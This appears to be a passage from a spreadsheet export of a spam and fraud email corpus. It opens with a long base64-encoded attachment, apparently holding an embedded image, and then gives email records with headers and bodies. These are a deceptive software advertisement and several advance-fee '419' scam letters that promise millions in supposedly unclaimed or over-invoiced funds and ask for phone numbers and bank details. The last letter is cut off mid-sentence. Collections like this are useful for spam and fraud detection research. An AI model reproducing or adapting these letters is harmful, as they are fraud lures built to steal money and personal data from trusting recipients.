gACzg8AANQPAADoDwAA/g8AAAwQAADzAAAAAAAA\nAAAAAAAA8wAAAAAAAAAAAAAAAPMAAAAAAAAAAAAAAADz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DAAAAyQBEmQeAAAAFiQBSWYBAAAAYSQBAAQMEAAADhAAACYQAAAhsAAAAAAAAAAAAAAAFQAA\nAAAAAAAAAAAAAAAAAAAMAAADJAESZA8AAAAWJAFJZgEAAABhJAEA3QAAFiQBFyQBSWYBAAAAApYP\nAAXWGAYSDwAGEg8ABhIPAAYSDwAAAAAAAAAAAAeUHgAI1nIABcT/AAdMDmcTnhmuIIAGsQMGEg8A\nBhIPAAYSDwAGEg8AgAaxAwYSDwAGEg8ABhIPAAYSDwCABrEDBhIPAAYSDwAGEg8ABhIPAIAGgwQG\nEg8ABhIPAAYSDwAGEg8AgAbdBAYSDwAGEg8ABhIPAAYSDwAJ1grAAMAAwADAAMAAEtYyAAAA//zc\n0wAAAAAAAP/83NMAAAAAAAD//NzTAAAAAAAA//zc0wAAAAAAAP/83NMAAAAT1jDM//8ABhoAAMz/\n/wAGGgAAzP//AAYaAADM//8ABhoAAAAAAP8AAAAAAAAA/wAAAAAU9gKIExU2ARrWFMz//wDM//8A\nzP//AMz//wDM//8AG9YUzP//AMz//wDM//8AzP//AMz//wAc1hTM//8AzP//AMz//wDM//8AzP//\nAB3WFMz//wDM//8AzP//AMz//wDM//8AM9YGAAEPAw8ANNYGAAEPAw8AYNYKAAAA//zc0wAAAGH2\nAwAAYtYUGhoaGhoaGhoaGhoaGhoaGhoaGhoAAiYQAAAsEAAAPBAAAGQQAABmEAAA8wAAAAAAAAAA\nAAAAAPMAAAAAAAAAAAAAAADzAAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAADCAAAWJAEXJAFJZgEAAAAClg8ABdYYBhIPAAYSDwAGEg8ABhIPAAAAAAAAAAAA\nB5QPAAjWXAAExP8AB0wOZxOuIIAGsQMGEg8ABhIPAAYSDwAGEg8AgAaxAwYSDwAGEg8ABhIPAAYS\nDwCABrEDBhIPAAYSDwAGEg8ABhIPAIAGugkGEg8ABhIPAAYSDwAGEg8ACdYIwADAAMAAwAAS1igA\nAAD//NzTAAAAAAAA//zc0wAAAAAAAP/83NMAAAAAAAD//NzTAAAAE9YwzP//AAYaAADM//8ABhoA\nAMz//wAGGgAAzP//AAYaAAAAAAD/AAAAAAAAAP8AAAAAFPYCiBMVNgEa1hDM//8AzP//AMz//wDM\n//8AG9YQzP//AMz//wDM//8AzP//ABzWEMz//wDM//8AzP//AMz//wAd1hDM//8AzP//AMz//wDM\n//8AM9YGAAEPAw8ANNYGAAEPAw8AYNYKAAAA//zc0wAAAGH2AwAAYtYQGhoaGhoaGhoaGhoaGhoa\nGgwAAAMkARJkDwAAABYkAUlmAQAAAGEkAQAEZhAAAGgQAADeEAAA4BAAAOIQAAADEgAAMhIAADMS\nAAA0EgAATxIAAPoAAAAAAAAAAAAAAADxAAAAAAAAAAAAAAAAtwAAAAAAAAAAAAAAAPoAAAAAAAAA\nAAAAAACxAAAAAAAAAAAAAAAAqwAAAAAAAAAAAAAAAF10AAAAAAAAAAAAAACrAAAAAAAAAAAAAAAA\nqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATgAAFiQBFyQBSWYBAAAA\nAFQBAAKWDwADNAEHlP8ACNYwAALE/5MDEhzgBIoCAAAAAAAAAAAAAAAAAAAAAIAE/hAAAAAAAAAA\nAAAAAAAAAAAAFPYCzBAVNgEa1ggAAAD/AAAA/xvWCAAAAP8AAAD/HNYIAAAA/wAAAP8d1ggAAAD/\nAAAA/zPWBgABDwMPADTWBgABDwMPAGH2AwAABgAAFiQBSWYBAAAABg8AFiQBSWYBAAAAADkAABYk\nARckAUlmAQAAAABUAQAClg8AB5TCAQjWGgABxP+4HYAEiBMAAAAAAAAAAAAAAAAAAAAAFPYCxhEV\nNgEa1gQAAAD/G9YEAAAA/xzWBAAAAP8d1gQAAAD/M9YGAAEPAw8ANNYGAAEPAw8AYfYDAAAJDwAD\nJAEWJAFJZgEAAABhJAEABAAAAyQBYSQBAAlPEgAAUBIAAFESAACxAAAAAAAAAAAAAAAArw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BAABOAAAWJAEXJAFJZgEAAAAAVAEA\nApYPAAM0AQeUDgEI1jAAAsT/kwMSHKACAAAAAAAAAAAAAAAAAAAAAAAAgAT+EAAAAAAAAAAAAAAA\nAAAAAAAU9gLMEBU2ARrWCAAAAP8AAAD/G9YIAAAA/wAAAP8c1ggAAAD/AAAA/x3WCAAAAP8AAAD/\nM9YGAAEPAw8ANNYGAAEPAw8AYfYDAAAAAjAAMZA4ATJQAgAfsIIuILDGQSGwCAcisAgHI5CgBSSQ\noAUlsAAAF7BTAxiw4AMMkKkB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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0QEAAEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0Mnqefm6zhGMggCqAEupCwIAAAAX\nAAAAVwAAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBjAHEAMQAxADQALgBjAG8AbQAuAGMAbgAvAEUA\nbgBnAGwAaQBzAGgALwBwAHIAbwBkAHUAYwB0AGkAbwBuAC8AagBpAGEAbwB0AG8AbgBnAHkAcwAv\nAG0AbwB0AG8ALwBtAG8AdABvAHoAaABhAG4AcwBoAGkALwBZAFgALwBZAFgANQAwAFEAVAAtADIA\nLgBoAHQAbQAAAODJ6nn5us4RjIIAqgBLqQuuAAAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGMAcQAx\nADEANAAuAGMAbwBtAC4AYwBuAC8ARQBuAGcAbABpAHMAaAAvAHAAcgBvAGQAdQBjAHQAaQBvAG4A\nLwBqAGkAYQBvAHQAbwBuAGcAeQBzAC8AbQBvAHQAbwAvAG0AbwB0AG8AegBoAGEAbgBzAGgAaQAv\nAFkAWAAvAFkAWAA1ADAAUQBUAC0AMgAuAGgAdABtAAAAUEsAAEQAZAAAAAAAAAAAAAAAAAAAAAAA\nAAAAABALlggbBhsGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPAATwAAEAALIECvAI\nAAAAAgQAAAAKAABTAAvw3AAAAARBAgAAAAXBvAAAAAYBAgAAAP8BAAAIAIHDAgAAAGgAdAB0AHAA\nOgAvAC8AdwB3AHcALgBjAHEAMQAxADQALgBjAG8AbQAuAGMAbgAvAEUAbgBnAGwAaQBzAGgALwBw\nAHIAbwBkAHUAYwB0AGkAbwBuAC8AagBpAGEAbwB0AG8AbgBnAHkAcwAvAG0AbwB0AG8ALwBtAG8A\ndABvAHoAaABhAG4AcwBoAGkALwBZAFgALwBpAG0AYQBnAGUAcwAvAFkAWAA1ADAAUQBUAC0AMgAu\nAGoAcABnAAAAAAAAABDwBAAAAAAAAIBSAAfw/EkAAAUFFl06ppSARzltOLmUX9iGdP8A2EkAAAEA\nAAAVAgAAAAAmAaBGHfDQSQAAFl06ppSARzltOLmUX9iGdP//2P/gABBKRklGAAECAQCWAJYAAP/t\nEBBQaG90b3Nob3AgMy4wADhCSU0D7QAAAAAAEACWAAAAAQACAJYAAAABAAI4QklNBA0AAAAAAAQA\nAAB4OEJJTQPzAAAAAAAIAAAAAAAAAAA4QklNBAoAAAAAAAEAADhCSU0nEAAAAAAACgABAAAAAAAA\nAAI4QklNA/UAAAAAAEgAL2ZmAAEAbGZmAAYAAAAAAAEAL2ZmAAEAoZmaAAYAAAAAAAEAMgAAAAEA\nWgAAAAYAAAAAAAEANQAAAAEALQAAAAYAAAAAAAE4QklNA/gAAAAAAHAAAP//////////////////\n//////////8D6AAAAAD/////////////////////////////A+gAAAAA////////////////////\n/////////wPoAAAAAP////////////////////////////8D6AAAOEJJTQQIAAAAAAAQAAAAAQAA\nAkAAAAJAAAAAADhCSU0EFAAAAAAABAAAAAM4QklNBAwAAAAADn8AAAABAAAAcAAAAFcAAAFQAABy\nMAAADmMAGAAB/9j/4AAQSkZJRgABAgEASABIAAD//gAmRmlsZSB3cml0dGVuIGJ5IEFkb2JlIFBo\nb3Rvc2hvcKggNS4y/+4ADkFkb2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMT\nFRMTGBEMDAwMDAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQU\nDg4ODhQRDAwMDAwREQwMDAwMDBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgAVwBw\nAwEiAAIRAQMRAf/dAAQAB//EAT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEB\nAQEAAAAAAAAAAQACAwQFBgcICQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIG\nFJGhsUIjJBVSwWIzNHKC0UMHJZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieU\npIW0lcTU5PSltcXV5fVWZnaGlqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEA\n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\nYy5jaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</t>
  </si>
  <si>
    <t>http://www.cq114.com.cn http://xent.com</t>
  </si>
  <si>
    <t>KHM</t>
  </si>
  <si>
    <t>5776</t>
  </si>
  <si>
    <t>To: &lt;cjohnsto@nstar.net&gt;, &lt;jlloyd@shorenet.net&gt;, &lt;rawl@juno.com&gt;,\nFrom: "Free Software" &lt;rjiohm4027@Flashmail.com&gt;\nDate: Thu, 08 Aug 2002 10:13:56 -1600</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 10:13:56 -1600</t>
  </si>
  <si>
    <t>"Free Software" &lt;rjiohm4027@Flashmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;cjohnsto@nstar.net&gt;, &lt;jlloyd@shorenet.net&gt;, &lt;rawl@juno.com&gt;,</t>
  </si>
  <si>
    <t>Web Pages Load 300% Faster without cable or DSL</t>
  </si>
  <si>
    <t>Web Pages Lo= ad 300% Faster! Named Online Software Product of=  the Year by AGI Consultants &lt;= FONT        face=3DVerdana color=3D#cc0000 size=3D6&gt;FREE 7-Day Trial Unique Software Solution Opens           Private High Speed Network-           No Cable or DSL Connection Required!           You'll Be Amazed! * Ke= ep Your Internet                  Provider! * Perfect for PC= 's, and                  Laptops! * Ke= ep Your Dial-up                  Modem! * Read Testimonials! FREE 7-Day T= rial! CLICK for 1-min. Download= Learn How to Get it Free Permanently!= SPEED UP EMAIL TOO! "I was going to sign up for cable modem service, but=  they          want $50 per month, plus I had to pay $120 for the cable mode= m. Then          I had to pay a guy to hook it all up. You guys rule!!!"&lt;= BR&gt;         (Roger S. from Teaneck, NJ.) "Nice job guys!!! Your software=  file          size is small, the download was quick and I can see a noticeable i= mprovement          in access speed. I am recommending it to all of our clients." (Computers Are Easy to Use-Raj Pa= tel)   Your            email address was obtained from a purchased list, reference #172= -54a.            If you wish to unsubscribe from this list, please Click            Here. All unsubscribe requests are honored. [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: johncarlos26@webmail.co.za\nFrom: john carlos &lt;johncarlos26@webmail.co.za&gt;\nDate: Thu, 08 Apr 2004 11:51:15 +0200</t>
  </si>
  <si>
    <t>Thu, 08 Apr 2004 11:51:15 +0200</t>
  </si>
  <si>
    <t>john carlos &lt;johncarlos26@webmail.co.za&gt;</t>
  </si>
  <si>
    <t>johncarlos26@webmail.co.za</t>
  </si>
  <si>
    <t>FROM JOHN CARLOS</t>
  </si>
  <si>
    <t>FROM: JOHN CARLOS\nTEL-27 83 342 4228\nCAPE TOWN, SOUTHAFRICA.\n                                            \nDear sir/madam\n\n              ASSISTANT AND INVESTMENT\n\nYou may be surprise to receive this letter from me since\nyou don't know me personally. I am the son of Dr. David\nCarlos who was recently murdered in the land dispute in\nZimbabwe. I got your contact through Network on line in my\nsearch for a reliable and reputable person to handle a very\n\nConfidential transaction which involves a transfer of fund\nto a foreign account and I decided to write you, My Late\nFather was among the few Black Zimbabwean Rich Farmers\nmurdered in Cold Blood by the agents of the ruling\ngovernment of President Robert Mugabe for his alleged\nsupport and sympathy for the Zimbabwean opposition party\ncontrolled by the white minority. \n\nBefore his death he had taken to Johannesburg - South\nAfrica to deposit the sum of US$ 18.5 Million (Eighteen\nMillion Five Hundred Thousand United States Dollars) with\nSecurity and Finance Company as if he foresaw the looming\ndanger in Zimbabwe. The money was deposited in a Box as \nValuables to avoid much demurrage from the Security\nCompany. This money was embarked from the purchase of New\nMachinery and Chemical for Farms and the establishment of\nnew farms in Lesotho and Swaziland. \n\nThis land problem arose when President Robert Mugabe\nintroduced a new land act that wholly affected the Rich\nWhite Farmers and some few blacks vehemently condemned the\n"Modus Operandi" adopted by the government.  This resulted\nto rampant killing and mob action by the war veterans and\nsome political thugs. Precisely, More than thirty-one (31)\npeople have so far been killed. Heads of governments from\nthe west, especially Britain and United States of America\nhave voiced their condemnation of Mugabe's plan.\nSubsequently, South African Development Community (S.A.D.C)\nhas continuously supported Mugabe's new land act, it is\nagainst this background that I and my family who are\ncurrently residing in South Africa have decided  to\ntransfer my Father's money into a Foreign Account. \n\nAs the eldest son of my Father, I am saddled with the\nresponsibility of seeking a genuine foreign account where\nthis money could be transferred without the knowledge of my\ngovernment who are tactically freezing our family wealth\nand South Africa's government seems to be playing along\nwith them. I am faced with the dilemma of investing this\nmoney in South Africa for fear of encountering the same\nexperience in future since both countries have almost the\nsame political history. More so, the South African Foreign\nExchange policy does not allow such investment hence we are\nseeking for an "ASYLUM".\n\nAs a businessperson whom I entrusted my future and that of\nmy family into his hands, I must let you know that this\ntransaction is 100% risk free and the nature of your\nbusiness does not necessarily matter. For your assistance,\nwe are offering you 30% of the total sum, 60% for Me and My\nFamily while 10% will be mapped out for any expenses we may\nincurs during the course of this transaction. We wish to\ninvest our part of the money on commercial property based\non your advice.\n\n\nFinally, all we demand from you is assurance that you will\nnot sit on this money when it finally gets to your personal\nor company's account in your country. If this proposal is\nacceptable by you, please confirm your interest via the\nabove TEL and or E-MAIL me.\n\nThanks and God Bless you.\n\nBest Regards.\nJohn Carlos\n\n\n\n\n\n\n\n\n\n\n\n______________________________________________________________\nHerbalife Independent Distributor [URL]http://www.healthiest.co.za[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.healthiest.co.za</t>
  </si>
  <si>
    <t>3117</t>
  </si>
  <si>
    <t>To: nan\nFrom: DrDinka Dogon &lt;drdinka015dogon@hotmail.fr&gt;\nDate: Thu, 07 Jun 2007 21:05:28 +0000</t>
  </si>
  <si>
    <t>Thu, 07 Jun 2007 21:05:28 +0000</t>
  </si>
  <si>
    <t>DrDinka Dogon &lt;drdinka015dogon@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF DR DINKA DOGON\nBILL AND EXCHANGE MANAGER .\nAFRICAN DEVELOPMENT BANK . BURKINA FASO ANNEX.\n\nI hope this meets you in good health, My name is Dr Dinka Dogon the  manager \nof bill and exchange at the foreign remittance department of  African \ndevelopment bank , Burkina Faso Annex here in Ouagadougou, west  africa.\n\nIn my department we discovered an abandoned sum of Twenty-two Million United \n  States Dollar US$22m dollars in an account, belonging to one of our \ncustomer  Eng. Christian Eich ,Who died alongside with his entire family on \nMonday,  31 July, 2000 in a plane crash in paris.\n\nSince we got information about his death, we have been expecting his next  \nof kin to come over and claim his money because we cannot release it unless  \nsome body applies for it as next of kin or relation to the deceased as  \nindicated in our banking guidlines and laws but unfortunately we learnt\nthat all his supposed next of kin or relation died alongside with him at the \n  plane crash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I and my colleagues decided to make \n  this business proposal to you and release the money to you as the next of  \nkin or relation to the deceased for safety and subsequent disbursement since \n  nobody is coming for it and we don't want this money to go into the bank  \ntreasury as unclaimed bill.\n\nThe banking law and guidline here stipulates that if such money remained  \nunclaimed after seven years, the money will be transfered into the bank  \ntreasury as unclaimed fund. The request of foreigner as next of kin in this  \nbusiness is occassioned by the fact that the customer was a foreigner and a  \nBurkinabe cannot stand as next of kin to a foreigner.\n\nTherefore, to enable the immediate transfer of this fund to your designated \nbank account ,you must apply first to the bank as a relation or next of kin \nof the deceased with a text of application that we will send to you, so we  \nwill like you to send to us your private telephone , fax number  for easy \nand effective communication and location where the money\nwill be remitted.\n\nUpon receipt of your reply, we will send to you by fax or email the text of  \nthe application . we will not fail to bring to your notice that this \ntransaction is hitch-free and that you should not entertain any atom of fear \nas all required arrangements have been made for the transfer. You should\ncontact us immediately as soon as you receive this letter.\n\nTrusting to hear from you immediately.\nYours faithfully.\nDr Dinka Dogon\nBill &amp; Exchange Manager,\nAFRICAN DEVELOPMENT BANK (A.D.B.BF ANNEX )\n\n_________________________________________________________________\nDcouvrez le Blog heroic Fantaisy d'Eragon! \n[URL]http://eragon-heroic-fantasy.spaces.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>303</t>
  </si>
  <si>
    <t>To: makalele1@excite.com\nFrom: makalele01@xzapmail.com\nDate: Thu, 07 Aug 2003 16:45:03 +0100</t>
  </si>
  <si>
    <t>Thu, 07 Aug 2003 16:45:03 +0100</t>
  </si>
  <si>
    <t>makalele01@xzapmail.com</t>
  </si>
  <si>
    <t>makalele1@excite.com</t>
  </si>
  <si>
    <t>Confidential Matter</t>
  </si>
  <si>
    <t>Engr.Makalele Johnson.\nPretoria\nSouth Africa.\n\n\nFOR YOUR KIND ATTENTION. \n\nIt is my great pleasure to write you this letter on behalf of\nmy colleagues. I got your information from a personal search in the\ninternet business index. I have decided to seek a confidential \nco-operationwith you in execution of a deal hereunder for the benefit of\nall \nparties, and hopeyou will keep it confidential because of the nature of\nthis business.\nWithin the Ministry of Energy and Mineral Resources where I work\nas a Director of Project Implementation, and with co-operation\nof four other top officials, we have in our possession, an overdue\npayment in US funds. The said funds represent certain percentage\nof the contract value executed on behalf of my Ministry by a\nforeign contracting firm, which we the officials over-invoiced\nto the amount of US$25,500,000.00 (Twenty-Five Million Five Hundred\nThousand United States Dollars). Though the actual contract cost\nhas been paid to the original contractor, leaving the excess balance \nunclaimed. \n\nSince the present elected Government is determined to pay foreign\ncontractors all debts owed, so as to maintain good relations\nwith foreign governments and non-governmental financial agencies.\nAs a result we included ours bills for approvals with the co-operation\nof some officials at the Department of Finance and the Reserve\nBank of South Africa (RBSA). We are seeking your assistance as\nthe beneficiary of the unclaimed funds, since we are not allowed\nto operate a foreign account. \n\nI have the authority of my colleagues involved to propose that,\nshould you be willing to assist us in this transaction your share\nas compensation will be 25% while my colleagues and I receive 70%, and\nthe balance of 5% for taxes and miscellaneous expenses incurred.\nIt does not matter whether or not your company does contract\nprojects of the nature described here. The assumption is that\nyour company won the major contract and subcontracted it to other\ncompanies. More often than not, big trading companies and firms\nof unrelated fields wins major contracts and subcontract to more\nspecialized firms for execution. \n\nI have reposed my confidence in you and hope that you will not\ndisappoint me. Endeavor to contact me immediately through my\n e-mail address above,to indicate whether or not you are interested in this\ndeal. If\nyou are not, it will enable me scout for another foreign partner\nto carry out this deal.I want to assure you that my partners\nand myself are in a position to make the payment of this claim\npossible provided you can give us a very strong assurance and\nguarantee that our share will be secured.It is important that\nyou treat this matter with utmost confidentiality as any form\nof exposure 